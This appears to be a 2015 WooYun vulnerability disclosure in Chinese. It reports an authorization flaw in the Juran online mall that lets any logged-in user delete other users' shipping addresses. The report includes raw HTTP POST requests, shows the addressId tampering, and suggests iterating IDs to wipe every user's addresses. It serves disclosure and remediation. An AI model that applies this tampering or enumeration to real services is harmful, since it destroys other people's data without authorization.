当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160777

漏洞标题:居然之家存在设计缺陷导致可越权删除线上百万用户收货地址

相关厂商:居然之家

漏洞作者: 路人甲

提交时间:2015-12-17 21:56

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-17: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

北京居然之家投资控股集团有限公司,成立于1999年3月份,是由全国华联商厦联合有限责任公司、北京中天基业投资管理有限公司等33位股东共同投资设立的大型国有控股股份制企业,注册资本8100万元人民币。
存在问题的业务:http://mall.juran.cn
存在问题的链接:http://mall.juran.cn/myspace/userinfo/taddresses.htm
在删除用户的收货地址时,没有校验权限,导致可越权批量删除线上百万收货地址

详细说明:

0X00收货地址管理(这个界面得先下单的时候填写默认收货地址才会出现)
http://mall.juran.cn/myspace/userinfo/taddresses.htm

jurana证明2.png


0X01点击删除图标,截取删除的收货地址的接口
POST /myspace/userinfo/delete_trade_address.htm HTTP/1.1
Host: mall.juran.cn
Content-Length: 32
Accept: */*
Origin: http://mall.juran.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://mall.juran.cn/myspace/userinfo/taddresses.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: XXXXXXXX
addressId=1088503&userId=1134073

juran5.png


0x02 遍历addressId即可删除所有用户的地址
0X03 我用了两个账户做测试(自己注册的)
账户A截图:

juranacc1.png


账户B截图:

juranacc2.png


0X04此时点击账户A的收货地址删除图标,拦截请求
POST /myspace/userinfo/delete_trade_address.htm HTTP/1.1
Host: mall.juran.cn
Content-Length: 32
Accept: */*
Origin: http://mall.juran.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://mall.juran.cn/myspace/userinfo/taddresses.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: XXXXXXXX
addressId=1088502&userId=1134073

juranacc2的收货地址.png


0X05 将addressId=1088502改为账户B的addressId=1088503,放行。我们刷新下账户B的页面,发现收货地址被删除,证明此处存在越权

jurana证明.png


jurana证明2.png

漏洞证明:

0X05 将addressId=1088502改为账户B的addressId=1088503,放行。我们刷新下账户B的页面,发现收货地址被删除,证明此处存在越权

jurana证明.png


jurana证明2.png

修复方案:

严格校验权限

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝